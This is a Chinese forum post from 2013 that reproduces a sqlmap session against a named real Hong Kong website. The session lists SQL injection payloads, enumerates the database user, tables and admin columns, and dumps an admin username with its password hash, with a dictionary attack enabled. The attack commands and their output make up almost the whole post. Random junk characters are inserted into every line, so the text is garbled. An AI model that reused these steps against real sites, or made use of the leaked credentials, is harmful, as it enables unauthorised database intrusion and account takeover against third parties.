D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- Y1 {- g; q; P/ Y. J$ ]
ms "Mysql" --current-user /* 注解:获取当前用户名称
9 N2 r- ~! ]/ k! J sqlmap/0.9 - automatic SQL injection and database takeover tool
$ @/ m- N5 O' Y6 A, n+ u( \' x1 ? http://sqlmap.sourceforge.net starting at: 16:53:54
2 ~( r: w9 M: `9 L+ d1 n: w3 @; f[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% C2 [5 t! G7 c4 G" g/ L" x
session file1 j6 z1 r1 `0 y' y
[16:53:54] [INFO] resuming injection data from session file2 y) U+ V6 _$ ^. f: I% \$ X
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: n9 y: d/ G; }, h2 I) y
[16:53:54] [INFO] testing connection to the target url
& M, w; V1 s% q. xsqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ a8 z% z8 w7 o3 x$ H" f' `sts: l) ~! x2 _3 r/ D k7 S
---0 Y; x+ P) q% Z% [9 Q" e
Place: GET
+ m" ~! D% Y6 ?! VParameter: id% p: O$ Q! Q7 o/ C( C
Type: boolean-based blind2 Z# p; K8 p0 Z' f6 k
Title: AND boolean-based blind - WHERE or HAVING clause( X$ u0 f5 X5 W0 r7 X. j: P! q
Payload: id=276 AND 799=799
4 N! W; W( i2 m* p# H* ]. o! \ Type: error-based4 y/ A1 P+ s' O, F' ]9 o8 j
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ ~- l7 m) @0 B+ R8 b; S Y
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 u! k- P9 p# c: Z9 ?: X% U1 e
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, i# \+ ]3 ~4 W _
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
; T+ T2 _4 {# E$ A- k# m( e Type: UNION query
- g* M1 l: Z" q8 k0 t" n- p& a Title: MySQL UNION query (NULL) - 1 to 10 columns) b% r: {) k2 z) K, X
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 K* T+ k* ?1 \7 [( H7 v* {(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 D! _2 Q* v# \/ o4 L0 g9 i
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, ^6 Z/ h; r/ x6 ~, B! {/ Q Type: AND/OR time-based blind. c7 e0 u9 ]( c+ o# _. m8 K5 g* h
Title: MySQL > 5.0.11 AND time-based blind
% G: Q& W% _# c! @ Payload: id=276 AND SLEEP(5)4 r3 m$ D3 }& X4 w* \5 Z
---
% k5 ]6 B4 a, T+ P! r4 Q[16:53:55] [INFO] the back-end DBMS is MySQL* Z- a# P" w5 y7 N9 }% Y+ T& F
web server operating system: Windows
! l9 t$ c1 u6 V3 z. z8 r0 dweb application technology: Apache 2.2.11, PHP 5.3.0
( ^% l& a7 k4 Yback-end DBMS: MySQL 5.0; k4 c" T$ d& a$ P6 k5 f
[16:53:55] [INFO] fetching current user; e7 H S- U4 G% k- R
current user: 'root@localhost' p0 P J. e% |) o, ^
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou h* {1 D$ M0 ^' c: R' x
tput\www.wepost.com.hk' shutting down at: 16:53:58
0 @$ U( d! n, h3 }8 B. _
8 k2 ]. k% }' |' d/ B' V2 VD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 E# ^0 s' s m) G( q9 s0 w
ms "Mysql" --current-db /*当前数据库1 v" a8 p3 s0 d3 |! m7 O8 l4 e9 I5 V( G
sqlmap/0.9 - automatic SQL injection and database takeover tool
% h/ c$ q% |- R# t http://sqlmap.sourceforge.net starting at: 16:54:16
3 @8 v4 ^6 W- O. Z8 Q3 ~6 Y[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as4 K( G# Z3 }4 t
session file
( A# s9 J+ a- F8 R+ |8 N[16:54:16] [INFO] resuming injection data from session file
; K5 _ x! ?( c0 s/ N[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
9 u [3 U7 T- w- C. H {[16:54:16] [INFO] testing connection to the target url
( U) N k. p, v9 |; }# Wsqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ p! ~& v \7 n# [5 xsts:
; ~- i7 D' d4 ^0 l! A---2 g) Q4 m( d- p0 R7 I
Place: GET+ z x/ W( P; D3 E) r
Parameter: id' y. c8 J$ [0 t& X
Type: boolean-based blind
6 s% R D, l( | Title: AND boolean-based blind - WHERE or HAVING clause a4 b( E; A2 [0 H
Payload: id=276 AND 799=799
$ d# V5 v7 v% k' S, q6 @, A! D Type: error-based7 l3 d$ I0 I3 O9 q
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
# R4 w+ W' ~# u' i Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" @9 j ?7 r3 C% o* n120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
, V2 O5 f+ B; h) e# S% H- a),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): ^) D7 W& ~5 {7 k; i2 s
Type: UNION query0 T& `& B# A h/ q8 `) K
Title: MySQL UNION query (NULL) - 1 to 10 columns7 P" y4 a1 t4 \
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( W" T! o: b% n6 A(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 Y! n3 y# `- h( Z1 X( P2 d4 d
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#3 T+ } T- L3 [9 }) Z
Type: AND/OR time-based blind
- t+ X8 G1 g" x/ y; _ Title: MySQL > 5.0.11 AND time-based blind
% u. p% \/ T" ] Payload: id=276 AND SLEEP(5)
7 s* G: Z, _' j4 X, |---
) p/ P) Z/ R0 B0 P[16:54:17] [INFO] the back-end DBMS is MySQL" P, C) f! f' M2 ?
web server operating system: Windows2 y% K, d: {0 O7 j
web application technology: Apache 2.2.11, PHP 5.3.0- Z" w: H( C K
back-end DBMS: MySQL 5.0$ i2 h8 k+ ?; G! D. k
[16:54:17] [INFO] fetching current database
2 k. A# w' ~+ gcurrent database: 'wepost', T% C* m6 B; _/ N. n5 h
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou" W8 t" m; H2 y3 r
tput\www.wepost.com.hk' shutting down at: 16:54:183 [: o2 }3 n- p! Z7 k) s
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 T2 o% h$ {, t7 K; D# C. T
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
, b% W* d/ j) Y4 k9 O( A8 h sqlmap/0.9 - automatic SQL injection and database takeover tool
2 R; [8 f; W/ [+ | http://sqlmap.sourceforge.net starting at: 16:55:25
% q5 h; U+ V5 {1 \/ l- ?[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 [4 A: M: i" U# Z" a
session file$ y: w3 v, M# H) `5 c
[16:55:25] [INFO] resuming injection data from session file6 Q g8 `/ k# L9 Z( B0 Z: N
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
`1 r! w. ^8 `7 T7 K [/ o1 I# n! e[16:55:25] [INFO] testing connection to the target url
6 s F# q; O. r6 r; F% e# Fsqlmap identified the following injection points with a total of 0 HTTP(s) reque
" ?. U( i7 j" ]6 I8 F- Q+ ksts:- w3 M( h6 P s0 L- t
---. L/ c s5 v( t( }
Place: GET* k# l- X8 ^2 ^! B% G. u
Parameter: id0 B, C M! A) J' Q+ Y& x7 N
Type: boolean-based blind& d. B5 R$ H7 t0 x& K+ ]& |
Title: AND boolean-based blind - WHERE or HAVING clause7 U, @1 T1 ?- M
Payload: id=276 AND 799=799
. C1 `) h$ T) J5 W+ I Type: error-based
( j1 G7 L% { V: `3 y i6 `' ]( _+ p6 x Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- q L Q$ d. r/ } Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 X% R% R1 ?! d4 Z2 y; w4 Z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# n5 s9 A& r; o$ j, J* T
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): \( }5 D- F( v% G: m! U
Type: UNION query
o% u2 p8 S. N$ _. }7 G+ G Title: MySQL UNION query (NULL) - 1 to 10 columns
2 Y! Q: @. z$ a; o% C Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
. d* C$ H5 U5 Y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( [( g& V" }- Y+ D
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 R$ S5 g8 u% w
Type: AND/OR time-based blind$ [ ~1 }8 c* d9 m8 ]. b' t
Title: MySQL > 5.0.11 AND time-based blind6 O0 x/ ]! u0 p, b# X5 n5 e
Payload: id=276 AND SLEEP(5)3 R s! B( Z' V' Q, {
---
7 B- s7 _& n7 ?5 k[16:55:26] [INFO] the back-end DBMS is MySQL$ F* S: u5 W8 h2 X
web server operating system: Windows. f4 r( o' e3 z/ S% y
web application technology: Apache 2.2.11, PHP 5.3.03 V3 T+ l; d4 C- \7 `) m# F
back-end DBMS: MySQL 5.0
$ H" M8 Y7 x+ p4 ~" h7 Y[16:55:26] [INFO] fetching tables for database 'wepost'0 r5 l6 E! L# R- v/ f, ~) C$ W
[16:55:27] [INFO] the SQL query used returns 6 entries' R+ m/ d3 p( r7 G e
Database: wepost2 `: `) z7 G2 W: n3 \" N# ]
[6 tables]0 i8 `) S- U' t# y/ b2 j p g
+-------------+) ?0 C9 b( w* c( O) j4 y0 ]
| admin |8 J4 ^- r3 X% e. N7 c
| article |% v8 J. Y/ n8 ]3 k9 N5 S8 N
| contributor |3 H5 ~4 |( o8 o' M
| idea |
5 [# ]* G- n5 f7 h: d| image |* {) S* p& m. ]9 j! }5 G
| issue |9 c9 X. V H6 `( F
+-------------+
3 [7 p) _ i/ I# |$ Y[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
, L7 T- ^1 `1 j2 ~) l2 _8 ftput\www.wepost.com.hk' shutting down at: 16:55:33; g- V/ h% ]# i1 f: e. q
p& m; ?1 W% c T4 oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- U) I$ W- r# X6 ^) h2 G
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
. h* ^5 v# ` i/ W sqlmap/0.9 - automatic SQL injection and database takeover tool
* r5 F% K$ ~, E; f' K http://sqlmap.sourceforge.net starting at: 16:56:06/ z U: S2 ]( r! A
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ u& D& w: j( z! J- O1 [" K4 ^sts:3 r$ p, V* n2 j; U4 @
---
3 D( M) [) }$ f. HPlace: GET
( I9 m' o/ W9 f0 Z1 g: n. i) Z% nParameter: id
" l' B( ^! g6 F# Y9 F Type: boolean-based blind
! v/ e y3 @2 \% B$ q+ m Title: AND boolean-based blind - WHERE or HAVING clause
8 _7 w1 i' a$ o Payload: id=276 AND 799=799
4 h& w4 j9 b' Y/ R Type: error-based
% b: S* J, ~8 [ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
4 G; k5 W+ i! H! ?" z ~ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
1 i5 E ~9 g x120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
: i, I- g9 m& K6 X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
4 m6 s' @( a5 l( ~& p Type: UNION query
. R2 S; c% A( u+ R4 }) F; f Title: MySQL UNION query (NULL) - 1 to 10 columns) m: Z( F. o w
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 h3 h. G' Z! f6 F7 T3 q h& Y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. C; ^: H% |9 K3 J2 {
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 U- k; Z( X1 s6 ~# W7 h
Type: AND/OR time-based blind1 k+ H' q; v4 N2 @4 [2 a
Title: MySQL > 5.0.11 AND time-based blind# V* t) F4 ?. V- D8 w# u
Payload: id=276 AND SLEEP(5)& z. A) Z1 ~) L0 R$ x5 h
---
m! B) W4 \) lweb server operating system: Windows* r2 q9 f0 M- t- I6 `9 S" h
web application technology: Apache 2.2.11, PHP 5.3.0
; o+ d% U! m' Fback-end DBMS: MySQL 5.0
; V! X- `7 P# S+ A& w* X[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se+ C! f; ?; Y3 w* k3 O
ssion': wepost, wepost6 D; _) t/ `7 G; G
Database: wepost
; Q3 v6 t) W" i. KTable: admin8 o( T. E9 S b8 z$ K% k0 x
[4 columns]
4 s! a* V' s. }' H, U3 R | T5 @+----------+-------------+, t1 }2 \3 V8 Y; o! P/ w
| Column | Type |
( n# y2 i# N& p+ \+----------+-------------+% v; U. h1 w0 v. g* B9 ~. O
| id | int(11) |3 ]5 q I" l1 y7 O
| password | varchar(32) |
/ {+ [) N7 P# _ f& X" g( E: R| type | varchar(10) |& [" I% c" u1 k! S% {6 R
| userid | varchar(20) |! o3 T* x7 m0 O" R9 P" y
+----------+-------------+
+ B2 ]4 D9 P% X+ ?( ^ shutting down at: 16:56:196 L& U% \) Y9 K( H0 D
' L' G3 ]) P- p
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" Y% y$ U4 B5 R. v( A$ Y- h" xms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容' J: o7 `4 g+ ? l) s2 x# C" a
sqlmap/0.9 - automatic SQL injection and database takeover tool
/ F; h" t5 l) P5 Q4 q1 U http://sqlmap.sourceforge.net starting at: 16:57:14
5 f$ d* y3 k; j* Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque/ S0 g2 `. ~. W7 M* K$ ?$ M
sts:
2 \0 B, z# d" p0 I4 D* H% c' V---
) C6 i s, E! }5 w) E' V. uPlace: GET
1 ~& s8 D& n8 w* I b* a$ Z T2 ?Parameter: id; b: U+ }& U, {' n2 n; H$ H8 C/ Y
Type: boolean-based blind
+ I" Y1 D- Q7 ?7 C( U- \ Title: AND boolean-based blind - WHERE or HAVING clause/ l/ d5 N4 Z: F4 v2 u4 o c
Payload: id=276 AND 799=799
/ P$ F8 x0 f" E* b9 f+ P Type: error-based
7 o9 h5 z3 |1 t6 D t) k7 y E Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* |# j3 R% |1 P! k# V) c
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 R. p# S, K# |+ |
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! a2 i- m4 g& C( N
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! h# A* z/ t& y5 i' S& X" `" E! A Type: UNION query
0 h5 P5 H( J8 h Title: MySQL UNION query (NULL) - 1 to 10 columns
1 i' f; S3 F/ f" E* t. e& n5 w Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ B, K* ?! B6 x: z; R# p1 y% w C0 m(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
1 ]0 l$ R0 r7 r" j2 N- bCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& D- V( A$ F- O; {/ N. W$ | Type: AND/OR time-based blind/ Z' G8 F$ v" D0 p0 e& q; ^; {( {
Title: MySQL > 5.0.11 AND time-based blind
4 Q4 G+ B5 ?4 | Z: _+ g Payload: id=276 AND SLEEP(5)
|/ O7 Q: }# H9 N6 \- F: e- P--- z9 l# R' T& x5 F1 {" S: @
web server operating system: Windows
7 x5 F( G1 w& V( `9 `web application technology: Apache 2.2.11, PHP 5.3.0
& z2 P7 s- @* Y: x; Dback-end DBMS: MySQL 5.0
8 }" g; |6 J; irecognized possible password hash values. do you want to use dictionary attack o
$ l/ X6 r; c+ k7 D4 b3 V% Nn retrieved table items? [Y/n/q] y* |. V( @# a/ `( `5 e9 Z1 Q0 h
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]& [3 V8 X) A7 B; R: K, a O' q! k
do you want to use common password suffixes? (slow!) [y/N] y. b/ F$ K' I2 a6 c! Z6 p
Database: wepost
- {9 ^! H: G- P5 W( gTable: admin
% Z6 O3 j2 t+ s[1 entry]* F: f, {' U) U, k
+----------------------------------+------------+
8 @8 l; L1 w' X% }! M) {# I| password | userid |
5 \6 w- J6 T d+----------------------------------+------------+
. ~% V3 Z3 V* N) y& `0 H1 G| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |: e7 j2 D8 s3 ^* U; f# F0 A3 E
+----------------------------------+------------+9 y7 C9 T8 Y3 S: _! C
shutting down at: 16:58:14
4 z& h5 ^9 g( d8 C: ^: ~- i
1 n$ {6 B. @- F1 h7 `* @9 oD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对